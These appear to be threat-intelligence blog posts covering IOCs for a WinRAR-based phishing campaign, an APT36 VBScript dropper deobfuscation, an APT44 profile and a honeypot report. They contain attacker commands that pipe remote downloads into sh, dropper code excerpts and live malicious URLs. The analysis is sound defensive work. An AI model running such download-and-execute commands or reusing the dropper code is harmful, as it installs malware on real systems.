CloudFlare IP	app-334825a6-4a2b-48bc-be92-e0582d656006.cleverapps.io
194.58.66.5	No Domain
194.58.66.192	No Domain

Identified requests

Request URL	Sample Hash
http://president.gov.ua@readers.serveirc.com?/gss_11.11.2025/kidneyfih/broadlyrQZ.pdf	c7726c166e1947fdbf808a50b75ca7400d56fa6fef2a76cefe314848db22c76c
http://google.com@app-334825a6-4a2b-48bc-be92-e0582d656006.cleverapps.io/gpd_07.11.2025r/disputeqG1/concealedn2N.pdf	21ad5d05a43d599b6225cd883b10356f4b8cd465a2fcb2745d90cfa65c6cffa1
http://regnum.com@dilopendos.serveirc.com?/moss_10.11.2025/futureHtG/accountc7z.pdf	5437c7bc4423b8acb8a6646ac2cd5379101ac73b6011549b25f1cd95bb333cea
http://t.me@fixer.serveirc.com?/SUU_11.11.2025/dicontentedOhr/scoundrelit1.pdf	6aa9741f8b8629d0398049fa91dc5e7c28fd0d63bc76b3fd9be2dc196265263f
http://www.crimea.kp.ua@dears.serveirc.com/SVrr_12.11.2025/crookoxQ/learningB4J.pdf	d9fec61a4b1bb0ee158e65a7cea8c8098bf1ea2117289a48c2ae9e373bb50e22
http://www.bbc.com@fixfactors.serveirc.com?/mmoUU_13.11.2025/evolutionKPm/armourV2P.pdf	237696ecc370688a8d1894eb2f95af53a3c0f8d42eb540b7f529b4d4f4492bc0
http://nv.ua@serversftp.serveirc.com?/sss_10.11.2025/dialGsd/horribleNQx.pdf	7a1417492979f569747bf11211bf523d5479c163e717651ebba20ad73834b8bb
http://ssu.gov.ua@app-334825a6-4a2b-48bc-be92-e0582d656006.cleverapps.io/ss_07.11.2025/flashlightsK8Q/pondjsQ.pdf	27bd90199e426719d1c3ef214215a17fae23f257d8bcb7a806e394e8666158f0
http://www.golosameriki.com@open-pdf.serveftp.com/motherrDJ/ssu/flowerbedD6M/dressmakerpvv.pdf	27bd90199e426719d1c3ef214215a17fae23f257d8bcb7a806e394e8666158f0
http://5.8.18.46/sprdvth/tailor.ps1	18c4d384f8fef858accb57fff9dc4036bf52a051b249696b657162b1adcbf104
http://swet.tv@vacations-mic-games-scale.trycloudflare.com/regretxso/GP4/investigationer4/exhibtionLD6.pdf	18c4d384f8fef858accb57fff9dc4036bf52a051b249696b657162b1adcbf104
http://google.com@document-downloads.ddns.net/OD/sensationaSL/AprilcWs.jpeg	e4258bdfa82a1065aa1095ae2c6da4240f6ebe20ba285e56f1e216eec5984510
http://print-documents.freedynamicdns.net/SS/atomN2s/arwardU26.jpeg	eed1ab171c449173059d2c5955e6ddfa73aaf952c612210b82c85137f42e01b8
http://google-pdf.redirectme.net/OD/remisshKY/consentedjtP.jpeg	fc249b4686f4cfd98ab016aac32ecccf947012321a321d8e6463c17401b0c700
http://google.com@document-downloads.ddns.net/OD/quitzU2/comparativelyNWU.jpeg	478604b0f9323082b61521045a310b3362f405a0781a735dfe72f8ffed054be7
https://libraries-thus-yale-collaborative.trycloudflare.com/Gost/pitchedcbY/intenseLKt.jpeg	9ce60dde11c1ad72af22ccd774c0efe9c5a206e9dcfbc2388a1b09cc70747f09
http://194.58.66.5/Gost	3611035faf63b8bf14c88a9bd02e3783f2bde3128c97f6317d4d4c912463ef39

The actor makes heavy use of DynDNS subdomains, such as:

readers.serveirc.com
dears.serveirc.com
…and many others

All of these can be attributed to No-IP, which gives us a pool of recurring IP addresses (including IPs not associated with a Dyn-DNS domain name):

IP-Address	Provider	Country
194.58.66.5	BAXET-GROUP-INC – interlir.com	India
194.58.66.132	BAXET-GROUP-INC – interlir.com	India
194.58.66.192	BAXET-GROUP-INC – interlir.com	India
194.87.240.141	relcom.com	Czech Republic
194.87.230.166	BAXET-GROUP-INC – interlir.com	Greece
194.87.240.215	relcom.com	Czech Republic
185.39.204.82	globconnex.com	Turkey
45.141.234.234	globconnex.com	Ireland
5.8.18.46	Putin	Russia

Some of these IP addresses are provided by InterLIR, including the realcom addresses.
InterLIR is essentially an IP address marketplace: companies in need of IPv4 or IPv6 space can buy, rent, or sub-lease unused ranges.
The platform advertises fast provisioning, legally vetted transfers, and a European business focus.

Since IPv4 addresses are scarce (and expensive), entire micro-economies have formed around services like this, which attackers happily exploit for disposable infrastructure.

I also rechecked which of the domains still resolve to an active host. During that process, I identified fourteen domains that are currently still active and are likely still being used by the threat actor.

acess-pdf.webhop.me

backup.9fvzesn.us

creates.webhop.me

dears.serveirc.com

digitall.webhop.me

dilopendos.serveirc.com

fixer.serveirc.com

google-pdf.redirectme.net

hosting-redirect.sytes.net

political-news.serveirc.com

freedynamicdns.net

readers.serveirc.com

serversftp.serveirc.com

yeard.serveirc.com

Based on the information available so far, we can also compile a final overview of the files that have been distributed through this infrastructure:

Distributed By	File Name	Hash
document-downloads.ddns.net	2-1180-25_24.06.2025.HTA	af860c5ce9401a7fed857169da9522966b5a5269b2a8a030aaf902299947eb5b
	2-1180-25_24.06.2025.HTA	e4258bdfa82a1065aa1095ae2c6da4240f6ebe20ba285e56f1e216eec5984510
	rl_eed1ab171c449173059d2c5955e6ddfa73aaf952c612210b82c85137f42e01b8	eed1ab171c449173059d2c5955e6ddfa73aaf952c612210b82c85137f42e01b8
print-documents.freedynamicdns.net	040c9ed7-b806-4f08-b9d9-23301a968b03.tmp	79343d0211758029b5fbffb89caa041f51a1f20ddcb39e4fd2c3ccf677ed5f07
	rl_ab54862f180b379cb8d612fbb22891402e7d55151dba87e7b11e45c5e45b6d7c	ab54862f180b379cb8d612fbb22891402e7d55151dba87e7b11e45c5e45b6d7c
google-pdf.redirectme.net	2-1180-25_24.06.2025.rar	bc7e3c6c59d462b4aad5b8ea9d2f4d1eb9a70a28a6475ad2405adb8c701a8e05
	2-1180-25_24.06.2025.HTA (copy)	7c0af43f8a32cb68e7804844c03a1f73fa0121018f2684942c8bee13a665f62f
	2-1180-25_24.06.2025.HTA (copy)	78329e00fd2592eaa53c5f5a73bb635cd5e22300209c622e3d988fd7c0a3935a
document-prok.freedynamicdns.org	2-1180-25_24.06.2025.HTA (copy)	591cd91512c68ec091b824ee9084326153d3bb229f313f5869409c3358788d2f
write-document.freedynamicdns.org	2-1180-25_24.06.2025.HTA	4f844679b79baf9daa46751b7b6f15c2cb03a0162361f3863b42cf16e3a27984
dears.serveirc.com	2_1_1_7755_12.11.2025.xhtml	6256022d6a548acaf7fda1781a1121d2ea4d92ada829c9902c292e3aab27bd3f
hosting-redirect.sytes.net	Повістка про виклик357-16230-25_24.10.2025.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_357-16230-25_24.10.2025.HTA	fe3c9988490f950ed0d34d807664161bd90ef4e981e314f5a62e37cdd2cc2127
open-pdf.serveftp.com	Звернення народного депутата Верховної Ради України IX скликання 11-2967-25_23.09.2025.HTA	18c4d384f8fef858accb57fff9dc4036bf52a051b249696b657162b1adcbf104
	11-2967-25_23.09.2025.rar	68314e93b47d774e378d4c573f08417bf40ead61caaeafbc128c3c6dff96ae0c
	11-2967-25_23.09.2025.rar	dd140737bd81f4cba11769bbda0d48e071bd604ec21993ec85a60669f29c5537
pasive-host.gotdns.ch	837f64e8-811c-4045-a611-b51c85ac96d1.tmp	c012ff34ff9f834e3d28ec6bb1fe3c9528ace6396b6103b0aae1ef6c140c2fbe
systems-debug.ddns.net	2-1180-25_04.06.2025.HTA.crdownload (copy)	d9330f235584d387d6a08d35f8d501777f4e0b2a545f4752d459a9ad24c74772
procurature.freedynamicdns.org	2-1273-2025_06.08.2025.html	631c02badd9ea7e2835256290f649a02136b1df312c4c8cd4d3f5df4558e3595
ssu-procuror.redirectme.net	_ __ __ 2-1273-2025_07.08.2025.HTA.bin	f8f4d2e627462c2e8b443f2b8f5efe4c1f0c14d9b1796e9eb1a2b598e524eda0
procuror.servehttp.com	localfile~	e2232eed8cd5dd5ac898e65e25001e496f320155ef40582d8a2a6e221d655e00

This is not the full list of distributed files in this campaign, but i’ll keep track of further samples and update the list accordingly.

Recommendations for Defenders and Blue Teams

To mitigate and detect this campaign (and similar WinRAR-based exploitation attempts), i recommend the following defensive measures:

Update WinRAR immediately
Ensure that WinRAR is updated to version 7.12 (Beta 1) or later, where CVE-2025-6218 has been patched.
Block execution of HTA files
In most enterprise environments, .hta files should not be executed at all.
Enforce this via AppLocker, WDAC, or enterprise GPO restrictions.
Monitor for LOLBIN misuse
Flag suspicious executions of:
- mshta.exe
- wscript.exe
- powershell.exe (especially with remote URLs)
Monitor the Startup folder
Creation of .hta, .vbs, .js, or unknown executables inside:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
…should always be treated as high-severity alerts, alway have an eye on this lol.
Inspect email attachments
Particularly RAR/ZIP archives containing unusual path structures or files with “hidden extensions” (file.pdf:.hta, etc.).
Network defense
Block known C2 domains and sinkhole DynDNS-based infrastructure where possible.
Endpoint logging
Ensure Sysmon or a comparable EDR solution logs:
- Process creation
- File modification in Startup paths
- Network connections from LOLBINs
- Suspicious command-line parameters

Basically: watch for anything that behaves like Windows, but shouldn’t ^-^

IOC

Here is a list of all IOC’s of my analysis:

Click To Open IOC Table <<

Type	IOC
Domains (C2, Delivery, DynDNS Infrastructure)	readers.serveirc.com
	dears.serveirc.com
	yeard.serveirc.com
	fixer.serveirc.com
	dilopendos.serveirc.com
	serversftp.serveirc.com
	political-news.serveirc.com
	kia-court.serveirc.com
	downcraft.serveirc.com
	fixfactors.serveirc.com
	document-prok.freedynamicdns.org
	print-documents.freedynamicdns.net
	downloads-document.freedynamicdns.org
	write-document.freedynamicdns.org
	procurature.freedynamicdns.org
	google-pdf.redirectme.net
	ssu-procuror.redirectme.net
	acess-pdf.webhop.me
	digitall.webhop.me
	creates.webhop.me
	papilonos.hopto.org
	open-pdf.serveftp.com
	procuror.servehttp.com
	hosting-redirect.sytes.net
	diskpart.myddns.me
	selodovo.myddns.me
	pasive-host.gotdns.ch
	document-downloads.ddns.net
	systems-debug.ddns.net
	libraries-thus-yale-collaborative.trycloudflare.com
	vacations-mic-games-scale.trycloudflare.com
	app-334825a6-4a2b-48bc-be92-e0582d656006.cleverapps.io
	backup.9fvzesn.us

Active Domains Identified	acess-pdf.webhop.me
	backup.9fvzesn.us
	creates.webhop.me
	dears.serveirc.com
	digitall.webhop.me
	dilopendos.serveirc.com
	fixer.serveirc.com
	google-pdf.redirectme.net
	hosting-redirect.sytes.net
	political-news.serveirc.com
	freedynamicdns.net
	readers.serveirc.com
	serversftp.serveirc.com
	yeard.serveirc.com

IP Addresses	194.58.66.5
	194.58.66.132
	194.58.66.192
	194.87.230.166
	194.87.240.141
	194.87.240.215
	185.39.204.82
	45.141.234.234
	5.8.18.46

Cloudflare (used as fronting / relay)	libraries-thus-yale-collaborative.trycloudflare.com
	vacations-mic-games-scale.trycloudflare.com

List of Malicious URLs (Requests)	http://president.gov.ua@readers.serveirc.com?/gss_11.11.2025/kidneyfih/broadlyrQZ.pdf
	http://google.com@app-334825a6-4a2b-48bc-be92-e0582d656006.cleverapps.io/gpd_07.11.2025r/disputeqG1/concealedn2N.pdf
	http://regnum.com@dilopendos.serveirc.com?/moss_10.11.2025/futureHtG/accountc7z.pdf
	http://t.me@fixer.serveirc.com?/SUU_11.11.2025/dicontentedOhr/scoundrelit1.pdf
	http://www.crimea.kp.ua@dears.serveirc.com/SVrr_12.11.2025/crookoxQ/learningB4J.pdf
	http://www.bbc.com@fixfactors.serveirc.com?/mmoUU_13.11.2025/evolutionKPm/armourV2P.pdf
	http://nv.ua@serversftp.serveirc.com?/sss_10.11.2025/dialGsd/horribleNQx.pdf
	http://ssu.gov.ua@app-334825a6-4a2b-48bc-be92-e0582d656006.cleverapps.io/ss_07.11.2025/flashlightsK8Q/pondjsQ.pdf
	http://www.golosameriki.com@open-pdf.serveftp.com/motherrDJ/ssu/flowerbedD6M/dressmakerpvv.pdf
	http://5.8.18.46/sprdvth/tailor.ps1
	http://swet.tv@vacations-mic-games-scale.trycloudflare.com/regretxso/GP4/investigationer4/exhibtionLD6.pdf
	http://google.com@document-downloads.ddns.net/OD/sensationaSL/AprilcWs.jpeg
	http://print-documents.freedynamicdns.net/SS/atomN2s/arwardU26.jpeg
	http://google-pdf.redirectme.net/OD/remisshKY/consentedjtP.jpeg
	http://google.com@document-downloads.ddns.net/OD/quitzU2/comparativelyNWU.jpeg
	https://libraries-thus-yale-collaborative.trycloudflare.com/Gost/pitchedcbY/intenseLKt.jpeg
	http://194.58.66.5/Gost

Malware Filenames / Archives	Повістка про виклик_357-16230-25_24.10.2025.pdf
	Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf
	Перегляд підходів до призову під час мобілізації_2-3716-25_07.11.2025.pdf
	Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf
	Передати засобами АСУ Дніпро_2_1_1_7755_11.11.2025.pdf
	Передати засобами АСУ Дніпро_2_1_1_7755_12.11.2025.pdf
	Передати засобами АСУ Дніпро_3_8_2_7442_13.11.2025.pdf
	Передати засобами АСУ Дніпро_2_7_4_62_13.11.2025.pdf
	2-1180-25_24.06.2025.rar
	11-2967-25_23.09.2025.rar
	.pdf:............_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup.hta

Dropped / Delivered Payloads (HTA, HTML, tmp, Bin)	2-1180-25_24.06.2025.HTA
	040c9ed7-b806-4f08-b9d9-23301a968b03.tmp
	2_1_1_7755_12.11.2025.xhtml
	Повістка про виклик357-16230-25_24.10.2025.pdf:…………_AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_357-16230-25_24.10.2025.HTA
	Звернення народного депутата Верховної Ради України IX скликання 11-2967-25_23.09.2025.HTA
	837f64e8-811c-4045-a611-b51c85ac96d1.tmp
	2-1180-25_04.06.2025.HTA.crdownload
	2-1273-2025_06.08.2025.html
	_ _ _ 2-1273-2025_07.08.2025.HTA.bin
	localfile~

File Hashes (SHA-256)	af860c5ce9401a7fed857169da9522966b5a5269b2a8a030aaf902299947eb5b
	e4258bdfa82a1065aa1095ae2c6da4240f6ebe20ba285e56f1e216eec5984510
	eed1ab171c449173059d2c5955e6ddfa73aaf952c612210b82c85137f42e01b8
	79343d0211758029b5fbffb89caa041f51a1f20ddcb39e4fd2c3ccf677ed5f07
	ab54862f180b379cb8d612fbb22891402e7d55151dba87e7b11e45c5e45b6d7c
	bc7e3c6c59d462b4aad5b8ea9d2f4d1eb9a70a28a6475ad2405adb8c701a8e05
	7c0af43f8a32cb68e7804844c03a1f73fa0121018f2684942c8bee13a665f62f
	78329e00fd2592eaa53c5f5a73bb635cd5e22300209c622e3d988fd7c0a3935a
	591cd91512c68ec091b824ee9084326153d3bb229f313f5869409c3358788d2f
	4f844679b79baf9daa46751b7b6f15c2cb03a0162361f3863b42cf16e3a27984
	6256022d6a548acaf7fda1781a1121d2ea4d92ada829c9902c292e3aab27bd3f
	fe3c9988490f950ed0d34d807664161bd90ef4e981e314f5a62e37cdd2cc2127
	18c4d384f8fef858accb57fff9dc4036bf52a051b249696b657162b1adcbf104
	68314e93b47d774e378d4c573f08417bf40ead61caaeafbc128c3c6dff96ae0c
	dd140737bd81f4cba11769bbda0d48e071bd604ec21993ec85a60669f29c5537
	c012ff34ff9f834e3d28ec6bb1fe3c9528ace6396b6103b0aae1ef6c140c2fbe
	d9330f235584d387d6a08d35f8d501777f4e0b2a545f4752d459a9ad24c74772
	631c02badd9ea7e2835256290f649a02136b1df312c4c8cd4d3f5df4558e3595
	f8f4d2e627462c2e8b443f2b8f5efe4c1f0c14d9b1796e9eb1a2b598e524eda0
	e2232eed8cd5dd5ac898e65e25001e496f320155ef40582d8a2a6e221d655e00
	c7726c166e1947fdbf808a50b75ca7400d56fa6fef2a76cefe314848db22c76c
	21ad5d05a43d599b6225cd883b10356f4b8cd465a2fcb2745d90cfa65c6cffa1
	5437c7bc4423b8acb8a6646ac2cd5379101ac73b6011549b25f1cd95bb333cea
	6aa9741f8b8629d0398049fa91dc5e7c28fd0d63bc76b3fd9be2dc196265263f
	d9fec61a4b1bb0ee158e65a7cea8c8098bf1ea2117289a48c2ae9e373bb50e22
	237696ecc370688a8d1894eb2f95af53a3c0f8d42eb540b7f529b4d4f4492bc0
	7a1417492979f569747bf11211bf523d5479c163e717651ebba20ad73834b8bb
	27bd90199e426719d1c3ef214215a17fae23f257d8bcb7a806e394e8666158f0
	9ce60dde11c1ad72af22ccd774c0efe9c5a206e9dcfbc2388a1b09cc70747f09
	3611035faf63b8bf14c88a9bd02e3783f2bde3128c97f6317d4d4c912463ef39
	e4258bdfa82a1065aa1095ae2c6da4240f6ebe20ba285e56f1e216eec5984510

Behavioral Indicators (TTP-level)	mshta.exe
	wscript.exe
	powershell.exe -ExecutionPolicy Bypass -NoProfile -EncodedCommand
	%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup*.hta
	%TEMP%*.tmp
	<legit-domain>@<C2-domain>/<malicious-path>

APT36 – “Abaris” Deobfuscating VB Dropper

I recently discovered a sample attributed to the threat actor APT36 (“Transparent Tribe”) on MalwareBazaar.
APT36 (aka Transparent Tribe) is a Pakistan-aligned cyber-espionage group that has been active since at least 2013 and is primarily focused on intelligence collection against targets in South Asia (government, military, diplomatic and research organizations in India and Afghanistan)
The group is known for tailored phishing campaigns and diverse staging techniques (weaponized documents, malicious installers and platform-specific lures), and has a history of delivering custom backdoors and RAT families such as variants of Crimson/Eliza-style malware.
Recently observed activity shows the actor expanding its toolset and delivery methods (including Linux desktop-lures and cloud-hosted payloads), which underlines the need to treat seemingly innocuous artifacts (obfuscated scripts, shortcut files, or odd AppData/Temp files) as potentially dangerous.

The sample turned out to be a heavily obfuscated VBScript. In this post I will walk through the manual deobfuscation steps I performed.
The SHA256 hash of the file is “d35f88dce5dcd7a1a10c05c2feba1cf478bdb8a65144f788112542949c36dd87”

I first uploaded the file to virustotal. It has been uploaded the first time yesterday (18th of October 2025).
Some AV systems already detect the file as malicious.

(note: I call this sample “Abaris” because the dropper decodes part of its payload and writes it into a file named Abaris.txt, which is later used for execution.)

If you want to download the sample or my cleaned copy, you can find them here: https://github.com/Mr128Bit/apt-malware-samples/tree/main/Pakistan/APT36/Abaris

Original filename: Pak_Afghan_War_Impact_on_Northern_Border_India.vbs. I made a copy and renamed it to ap3.vbs for analysis.

When opening the file, you immediately notice a lot of Danish-looking comments/words scattered through the source. These are purely noise, they are there to hinder analysis and evade signature detection. But underneath the noise we can still find Visual Basic constructs that we want to extract.

We can filter out those comment lines very easily.

grep -v "^'" apt33.vbs | sed '/^[[:space:]]*$/d' > apt33_clean.vbs

The output looks much cleaner now, clear VB structures are visible, although the script remains heavily obfuscated.

The next step is to remove additional noise by deleting variables or code blocks that are only used in initialization and never referenced later.

After cleanup, the following code remains:

This is already much tidier. We identified three functions of interest: Crocodilite, Subskribenten, and Cashoo. They are small and not deeply obfuscated, so we can determine their purpose fairly quickly. It’s often useful at this stage to rename obfuscated variables and functions to meaningful names.

Crocodilite

This function creates a text file and writes the passed string into it. In this sample it is used to write the content of the variable tendrilous into Abaris.txt.

' ORIGINAL
Sub Crocodilite(Tudemiklens, Fissuriform)

    Dim Sinh, Galactometer
    Set Sinh = CreateObject("Scripting.FileSystemObject")
    Set Galactometer = Sinh.CreateTextFile(Fissuriform, True)
    Galactometer.Write Tudemiklens
    Galactometer.Close

End Sub
' ADJUSTED
Sub write_to_file(text, path)
    Dim fileSysObj, file
    Set fileSysObj = CreateObject("Scripting.FileSystemObject")
    Set file = fileSysObj.CreateTextFile(path, True)
    file.Write text
    file.Close

Subskribenten

This is a simple wrapper that executes a command via WScript.Shell. It’s used to invoke the payload that was written to disk.

' ORIGINAL
Set Plenicorn = CreateObject("WScript.Shell")
...
Function Subskribenten(Tautegorical)

    Call Plenicorn.Run(Tautegorical,0)

End Function

' ADJUSTED
Set shell = CreateObject("WScript.Shell")
...
Function Execute(payload)
    Call shell.Run(payload,0)

Cashoo

A decoder routine. It extracts characters at fixed intervals from a masking string (i.e. it removes padding characters and reconstructs the hidden string). This is a classic technique to hide URLs, commands or other sensitive strings from static signature scanners.

' ORIGINAL
Function Cashoo(ByVal Microsphaeric)

    for i = 4 to len(Text) Step 4
    ' Mid(string, start, length) extract a specified amount of characters from a string
    Cashoo = Cashoo & Mid(Text,i,Alenlang) 

    Next


End Function

' ADJUSTED
Function ExtractEveryFourthChar(ByVal Text)

    for i = 4 to len(Text) Step 4
    ' Mid(string, start, length) extract a specified amount of characters from a string
    ExtractEveryFourthChar = ExtractEveryFourthChar & Mid(Text,i,Alenlang) 

    Next


End Function

I implemented a Python equivalent to decode the payload. After I finished the script I fed several encoded strings from the VB file through it.
Additionally i loaded every string found for the variable “tendrilous” into a separate file “tendrilous.txt” for decoding purposes.
You can view the script here.

Result:

$Commonplacer=[char]34;
$Rasping=$env:tmp;
$Unbefringed=gc $Rasping\Abaris.txt -Delimiter $Commonplacer;
$Emydes=$Unbefringed.'substring'(4696-1,3);
.$Emydes $Unbefringed

The Python routine works as intended: it reads Abaris.txt, extracts a three-character command name from a specific offset, and would invoke that command with the file content as parameter i.e., dynamic code execution.

I also implemented a Python equivalent for this routine; the script is available in the repository.

After running my script, the payload output looks like this:

At first glance the output looks nasty, but it can be disentangled. Don’t panic. I applied line breaks and indentation in the right places to make control flow and function calls visible.

To make the code more readable I used the following commands:

sed -i 's/;\$/;\n\$/g' "$1"
sed -i 's/;Cenogenesis/;\nCenogenesis/g' "$1"
sed -i 's/{/{\n/g' "$1"
sed -i 's/}/\n}\n/g' "$1"
sed -i 's/;function/;\nfunction/g' "$1"
sed -i 's/;while/;\nwhile/g' "$1"

The result now looks much more promising:

There is still some noise embedded in a few places. We also discovered repeated calls to the Roberts function with additional encoded strings. I wrote a Python helper to extract those strings from the file and decode them with the same Roberts / Cashoo logic.

When we run that pipeline and merge the output under the previous deobfuscated view, we obtain the following consolidated result:

Final Script

This is the final deobfuscated dropper script. From it we can conclude the following:

The script repeatedly attempts to download a remote file from a suspicious URL and save it locally.
Once the file is available, it reads parts of it, Base64-decodes contained data, and reconstructs executable PowerShell code.
Finally, it executes that decoded code dynamically (via dot-sourcing / Invoke-Expression style execution).
This is a classic loader / bootstrapper pattern for delivering secondary stages of malware.

There are some formatting glitches in the decompiled output that likely arose during processing, but the overall intent is clear.

The dropper notably points at hxxps[://]zohmailcloud[.]com//cloud/Assholes[.]psm as one of the remote payload locations. I could not retrieve the file, the URL is no longer reachable but I did find a Twitter post referencing the file with MD5 7a5fe1af036b6dba35695e6d4f5cc80f.

If I manage to acquire the remote artifact later, I will write a dedicated follow-up article with a full 2nd-stage analysis.

APT44 – Sandworm Team

APT44 (Sandworm Team) – Quick Facts

Type: Advanced Persistent Threat (APT)
Aliases: Sandworm, Sandworm Team, Seashell Blizzard, Iron Viking, Telebots, Voodoo Bear, Iridium, FrozenBarents
Origin: Russia, linked to MUN 74455, a cyberwarfare unit of the GRU, Russia’s military intelligence service
Active Since: 2004
Primary Targets: Western corporations, government organizations, defense contractors
Motivation: Cybersabotage , Data theft

Tactics & Techniques (CLICK TO OPEN)

Tactics & Techniques:
Initial Access
– T1190 – Exploit Public-Facing Application.
– T1203 – Exploitation for Client Execution.
– T1199 / related: Spearphishing / Use of malicious files (spearphishing attachments / malicious files)
Execution
– T1059 – Command and Scripting Interpreter.
– T1059.001 – PowerShell.
– T1059.003 – Windows Command Shell.
– T1059.005 – Visual Basic (VBS).
Persistence
– T1543 / Create or Modify System Process (Service techniques) – z. B. Windows Service / Systemd service modifications.
– T1053.005 – Scheduled Task (Scheduled Task used via GPOs / scheduled jobs).
Privilege Escalation
– (verschiedene techniques observed in campaign artifacts; see Mandiant for low-level syscall / evasive behaviors)
Defense Evasion
– T1140 – Deobfuscate/Decode Files or Information (Base64, TripleDES, GZip usage).
– T1202 / Obfuscated Files or Information (software packing / obfuscation).
– T1562 / Impair Defenses – e.g., Disable or Modify Tools; Disable Windows Event Logging.
Credential Access
– T1555.003 – Credentials from Password Stores: Credentials from Web Browsers.
– T1003 (OS Credential Dumping) – e.g., LSASS memory dumping observed historically.
– T1056.001 – Input Capture: Keylogging (SetWindowsHookEx keylogger observed).
Discovery
– T1087.002 – Account Discovery: Domain Account discovery via LDAP queries.
– T1592.002 – Gather Victim Host Information: Software.
– T1018 – Remote System Discovery.
– T1046 / Network Service Scanning (Active Scanning / vulnerability scanning).
Lateral Movement
– T1021.002 – Remote Services: SMB/Windows Admin Shares (use of ADMIN$, net use).
– T1570 – / Lateral Tool Transfer / Ingress Tool Transfer (copying payloads, using network shares).
Collection
– T1213 – Data from Information Repositories (databases) – e.g., use of Adminer to exfiltrate DB data.
– T1005 – Data from Local System (internal docs, files).
Exfiltration
– T1041 – Exfiltration Over C2 Channel (HTTP C2 exfil observed).
Command and Control
– T1071.001 – Application Layer Protocol: Web Protocols (HTTP used by BCS-server and other tools).
– Protocol Tunneling / non-standard channels have also been used in some campaigns.
Impact
– T1486 – Data Encrypted for Impact (ransomware / Prestige used).
– T1561.002 – Disk Wipe: Disk Structure Wipe (KillDisk/CaddyWiper usage).
– T1484.001 – Domain or Tenant Policy Modification: Group Policy Modification (used to deploy wipers via GPO).
– T1499 – Endpoint Denial of Service (observed in disruption campaigns).
– T1491.002 – Defacement: External Defacement (mass website defacements).
Resource Development / Recon & Support (preparation)
– T1583 – Acquire Infrastructure (domains, servers, covert leased infrastructure).
– T1583.001 – Domains (register spoofing domains).
– T1583.004 – Server (use of leased / reseller infrastructure).
– T1595.002 – Active Scanning: Vulnerability Scanning (scanning target infrastructure).
Other observed behaviours / capabilities
– Use of custom destructive malware families (NotPetya, Industroyer variants, Olympic Destroyer, CaddyWiper, etc.).
– Use of third-party services for phishing campaigns and use of spoofed pages for credential harvesting.

Notable Campaigns:
- Exfiltration of corporate data across multiple industries, including aerospace, energy, and technology
Attributed Tools & Malware:
- BlackEnergy (BlackEnergy 3) – former backdoor/botnet framework used in attacks on Ukrainian energy suppliers (2015), among others.
- KillDisk (various wiper variants) – Destructive component used to destroy hosts in multiple campaigns.
- NotPetya / ExPetr (wiper masquerading as ransomware) – large-scale destruction/worm campaign in 2017.
- Industroyer / Industroyer2 (CrashOverride) – specifically designed for industrial control systems (ICS); the Industroyer family has been observed in Ukrainian infrastructure operations.
- Olympic Destroyer – Wiper/disruption malware used against the Pyeongchang Olympics; attribution was complicated, but often linked to Sandworm.
- CaddyWiper / other GPO/AD wipers – modern wiper variants that have appeared in recent sabotage campaigns.
- Infamous Chisel (Android components / Infamous Chisel family) – Persistent access/backdoor components for Android (2023 reports on Android targets).
- SwiftSlicer / AD-viper / Active Directory wipers – local/AD-targeted wiper components that appear in attack reports in 2023–2024.
- Custom C2/Beacon implementations & loaders (TeleBots / bespoke tooling) – Sandworm used its own C2 backdoors, beacon implementations, and droppers; TeleBots branding appears in connection with NotPetya.
- Downloaders / droppers / Android wrappers / malicious app wrappers – previous campaigns showed downloader wrappers in Play Store apps and disguised Android apps to deliver additional components.
Malware Samples:

Description

APT44 (commonly tracked as Sandworm Team or GRU Unit 74455) is a state-sponsored Russian cyber-espionage and sabotage actor known for highly targeted, persistent operations against government, military, critical-infrastructure, and high-value private sector targets. The group blends sophisticated custom tooling with commodity malware and living-off-the-land techniques to gain access, escalate privileges, move laterally, and maintain stealthy persistence. Its campaigns range from long-term intelligence collection to disruptive, destructive actions, deploying modular router malware, destructive wipers, and ICS-focused toolsets when operational goals demand sabotage. Operators demonstrate strong operational security, anti-sandbox/anti-analysis measures, and careful timing to align cyber activity with geopolitical objectives.

Whisper – Interesting Sandbox evasion?

In the past few days I found something fairly interesting in my sandbox. An attacker attempted to install malware, and the initial analysis led me a bit irritated. The attacker used several techniques to prevent delivering the payload to sandboxes. In this post I only show excerpts; I also published a repository on GitHub that contains the full artifacts.

Quick overview of the key facts:

Affected service: SSH
Honeypot: Cowrie
Attacker IP: 31.170.22.205
Commands executed: (see snippet below)

wget -qO- http://31.170.22.205/dl401 | sh
wget -qO- http://31.170.22.205/dl402 | sh
wget -qO- http://31.170.22.205/dl403 | sh
wget -qO- http://31.170.22.205/dl404 | sh
wget -qO- http://31.170.22.205/dl405 | sh
wget -qO- http://31.170.22.205/dl406 | sh
wget -qO- http://31.170.22.205/dl407 | sh
wget -qO- http://31.170.22.205/dl408 | sh

The attacker tried to download a shell script. It looks like this:

cd /tmp
rm -rf whisper.*
wget http://31.170.22.205/bins/whisper.armv5
chmod +x whisper.armv5
./whisper.armv5 410
cd /tmp
rm -rf whisper.*
wget http://31.170.22.205/bins/whisper.armv6
chmod +x whisper.armv6
./whisper.armv6 410
[...]

The script downloads several binaries, sets execute permissions on them, and then runs them. I tried to download those binaries myself and, oddly, every file had the exact same hash. Inspecting the file metadata revealed they are Windows executables.

I uploaded the file to VirusTotal for a quick look.

The file turned out to be Microsoft’s calc.exe, the standard Windows Calculator app. We can verify this by computing the file hash of calc.exe on a Windows machine:

That gives us confirmation. Since the attacker had already registered with our honeypot, I then attempted to download the files from the honeypot IP, which worked as expected. The attacker deliberately prevents his actual payloads from being easily analyzed by serving them only to selected targets.

Here’s a table of the downloaded binaries (click to open)

You can download them for analysis purposes here.

filename	sha256
whisper.aarch64	5f7dff5b5bdc2a12506cfb771e94b6ea26fec8a78f65cf927f361a39322036f4
whisper.aarch64be	7a2af6f8c55bfc6d0bb259b4df37641cfb0dc9a1c94e0955784cfd9b34dc08ef
whisper.arcle750d	c92038d168aa088997ea982aadf1d455ac4bc89332916a576117273610f3069f
whisper.arclehs38	3611fb87865bd967b6a1b2c3450e68cec14ec90abd9a790147e1544896e7b624
whisper.armv4	58189cbd4e6dc0c7d8e66b6a6f75652fc9f4afc7ce0eba7d67d8c3feb0d5381f
whisper.armv5	1d51c313c929d64c5ebe8a5e89c28ac3e74b75698ded47d1bc1b0660adc12595
